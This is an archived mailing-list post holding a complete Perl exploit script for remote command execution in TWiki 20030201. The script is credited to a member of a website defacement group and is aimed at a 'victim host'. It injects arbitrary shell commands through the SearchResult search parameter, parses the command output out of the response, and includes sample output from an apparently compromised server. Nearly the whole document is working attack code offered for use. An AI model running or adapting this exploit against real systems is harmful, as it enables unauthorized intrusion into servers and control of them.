<<< Date Index >>>     <<< Thread Index >>>

TWiki 20030201 VIEW string remote command execution



#!/usr/bin/perl
#
#   TWiki 20030201 VIEW string remote command execution 

vulnerability
#
#   Exploit coded by runvirus    GeekZ[at]WorldDefacers[d0t]NeT
#
#
#   [root@localhost perls]$ perl twikiview.pl -h www.victim.com 

-p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
#    -=[    TWiki :- view string remote command execution exploit   

  ]=-
#    -=[                      Coded by rUnViRuS                     

  ]=-
#    -=[    HOST:- www.worlddefacers.net www.secuirty-arab.com      

  ]=-
#
#     bash-2.05b --> uname -a;id
#
#       Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13 

08:59:31 CET 2005 i686 unknown
#      uid=16704(u36561933) gid=600(ftpusers)
#
#                      

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###################################################################

########################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "

uname -a;id";}
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command 

execution vulnerability ]=-\n";
print STDERR "-=[      HOST:- www.worlddefacers.net www.secuirty-

arab.com           ]=-\n";
print STDERR "-=[                         Coded by rUnViRuS         

                ]=-\n\n";

if ((!defined($host)) || (!defined($path))) {
Usage();
}


 print "bash-2.05b --> $thecmd\n\n";
 my $s = Net::HTTP->new(Host => "$host") || die $@;
 my $thecmd=URLEncode($thecmd);
 my $count=0;
 my $skip=0;
 my $buf2;

 my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27

s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l

+--+%27doesnotexist2";
  $s->write_request(GET => $path . "SearchResult?search=" . 

$exploit, 'User-Agent' => "Mozilla/5.0");
 my($code, $mess, %h) = $s->read_response_headers;

 #  ..,,;:: Procedura di parsing

 while (1) {
    my $buf;
    my $n = $s->read_entity_body($buf, 1024);
    die "read failed: $!" unless defined $n;
    last unless $n;
    $buf2 = $buf2 . $buf;
 }
    while (index($buf2,"__BEGIN__",$skip) != -1) {
          $from = index($buf2,"__BEGIN__",$skip);
          $count = $count +1;
          $from = $from + 9;
          $to = index($buf2,"__END__",$skip);
          $skip = $to+7;
          $chars = $to - $from;
          $grab  = substr($buf2, $from, $chars);
          if (($grab ne $oldgrab) && ($count != 1)){
             print "$grab\n";
             }
         $oldgrab = $grab;
        }
 if ( $count <= 1 ){
   print "Host not vulnerable\n";
 }

 #  ..,,;:: Procedura di encoding strarippata da snooq

sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}

sub Usage {
print STDERR "-=[        Options:    twikiview.pl -h www.exmpl.com -p           
     

                ]=-
-=[       -h Victim host  .                                         

  ]=-
-=[       -p Twiki path.                                            

  ]=-
-=[                 -c Command.                                     

 ]=-\n\n";
exit;
}